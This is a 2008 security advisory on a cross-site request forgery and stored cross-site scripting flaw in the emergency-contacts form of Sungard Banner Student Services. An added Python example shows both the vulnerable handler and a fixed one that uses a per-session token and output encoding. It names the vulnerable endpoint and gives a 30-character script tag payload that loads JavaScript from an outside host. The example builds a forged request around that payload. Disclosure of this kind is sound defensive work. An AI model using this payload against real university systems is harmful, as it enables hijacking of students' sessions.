CSRF/XSS in Sungard Banner



http://ch4n.org/banner.txt

Application: Banner -- Student Services
Version: 7.3
Bug: Cross-site Request Forgery, cross site scripting
Exploitation: Remote, against authenticated users
Discovery Date: August 21, 2007
Notification Date: August 22, 2007
Disclosure Date: January 29, 2008

Author: Brendan M. Hickey
Website: http://www.bhickey.net
http://www.ch4n.org

INTRODUCTION

"Banner is the world's most widely used collegiate administrative suite of
student, financial aid, finance, human resources, and advancement systems."
-- Sungard.com

"Banner Student fuses administrative and academic functions that make it
easy to manage data while giving prospects, learners (both traditional and
non-traditional), and faculty secure, 24x7, online access to the
information they need. Prospects can apply for admissions. Learners can
search and register for classes by term or date, and retrieve financial
aid data. Faculty can easily manage course information, rosters, and
grading, and advise students."

-- Banner Student product information
(http://www.sungardhe.com/Products/Product.aspx?id=1024)

University students interact with 'Banner Student Services' through a web
interface. Tasks are performed by making POST requests to fixed URLs.
A cross-site scripting attack facilitated by cross-site request forgery was
discovered in the "Emergency Contacts" section of the service.

BUG

A student may update her emergency contacts through a web form. Each form
field is checked for length (the longest accepts 30 characters) but not for
content, and the stored values are later displayed back to the user without
encoding. Because the update script accepts any POST request that carries
the user's session cookie, an attacker can inject arbitrary JavaScript into
a user's session by luring authenticated Banner users to a website that
makes a POST request to the update contacts script.

The script necessary to update the emergency contacts is located at:
http://BANNERDOMAIN/ss/bwgkoemr.P_UpdateEmrgContacts

Setting the address field (add1) to

<script src=http://ch4n.org/s>

is sufficient to include malicious JavaScript; the payload is exactly 30
characters long, so it passes the length check. Other form variables must
also be set; see the example code.

EXAMPLE CODE

http://ch4n.org/banner_code.txt

VENDOR NOTIFICATION

The vulnerability was disclosed to Sungard on August 22, 2007.

FIX

This vulnerability can be remedied by requiring an unguessable per-session
token (a "magic number", i.e. a synchronizer token) to accompany each
state-changing POST request and rejecting any request that lacks it. A page
on another origin cannot read the token, so it cannot forge a valid request.
Since the stored contact data is rendered back unencoded, the fields should
also be HTML-encoded on output so that injected script is displayed rather
than executed.
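
The following is an added example, not Banner code and not the author's
exploit code, illustrating both the BUG section (length-only validation,
unencoded display) and the FIX (a per-session synchronizer token plus output
encoding). The handler, session dictionary and form layout are constructed
stand-ins; only the field name add1, the 30-character limit, the endpoint
path and the payload come from the advisory.

```python
"""Synchronizer-token CSRF defence and output encoding for a Banner-style
'update emergency contacts' handler (added example; not Banner's code)."""

import hmac
import html
import secrets

MAX_FIELD_LEN = 30  # the longest contact field accepts 30 characters (advisory)
ENDPOINT = "/ss/bwgkoemr.P_UpdateEmrgContacts"  # from the advisory

# The advisory's payload: exactly 30 characters, so it passes the length check.
PAYLOAD = "<script src=http://ch4n.org/s>"


def length_ok(form):
    """The only validation the advisory describes: length, not content."""
    return all(len(v) <= MAX_FIELD_LEN for v in form.values())


def issue_csrf_token(session):
    """Bind a fresh unguessable token to the authenticated session.
    The real form page embeds it as a hidden field; a page on another
    origin cannot read it, so a forged POST cannot carry it."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def update_contacts_vulnerable(session, form):
    """Handler as the advisory describes it: any cookie-bearing POST whose
    fields are short enough is accepted, whoever built the request."""
    if not length_ok(form):
        return False
    session["contacts"] = dict(form)
    return True


def update_contacts_fixed(session, form):
    """Hardened handler: the POST must carry the token bound to this session."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    # Constant-time comparison; encode so a non-ASCII value cannot raise.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False  # forged, missing or mismatched token: reject
    fields = {k: v for k, v in form.items() if k != "csrf_token"}
    if not length_ok(fields):
        return False
    session["contacts"] = fields
    return True


def render_vulnerable(contacts):
    """Reflects stored values into the page unencoded: the stored XSS."""
    return "".join("<td>%s</td>" % v for v in contacts.values())


def render_fixed(contacts):
    """Encode on output so a stored '<script ...>' is shown, not executed."""
    return "".join("<td>%s</td>" % html.escape(v, quote=True)
                   for v in contacts.values())


# Constructed request bodies.  A victim lured to the attacker's page sends
# FORGED_FORM with the session cookie attached automatically but no token;
# a legitimate submission comes from the real form and carries the token.
FORGED_FORM = {"add1": PAYLOAD}


def legitimate_form(session):
    return {"add1": "123 Main St", "csrf_token": session["csrf_token"]}


def demo():
    """Run the vulnerable and fixed flows and return what each produced."""
    vuln_session = {}
    forged_accepted = update_contacts_vulnerable(vuln_session, FORGED_FORM)
    vuln_html = render_vulnerable(vuln_session["contacts"])

    fixed_session = {}
    issue_csrf_token(fixed_session)
    forged_rejected = not update_contacts_fixed(fixed_session, FORGED_FORM)
    legit_accepted = update_contacts_fixed(fixed_session, legitimate_form(fixed_session))
    fixed_html = render_fixed(fixed_session["contacts"])
    return {
        "forged_accepted_by_vulnerable": forged_accepted,
        "vulnerable_html": vuln_html,
        "forged_rejected_by_fixed": forged_rejected,
        "legitimate_accepted_by_fixed": legit_accepted,
        "fixed_html": fixed_html,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=>", v)
```

The token alone closes the cross-site path but does not make the field
safe: a user who submits the payload through the real form still stores
it, so render_fixed encodes on output. Both changes together are the fix;
either alone leaves one half of the problem in place.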


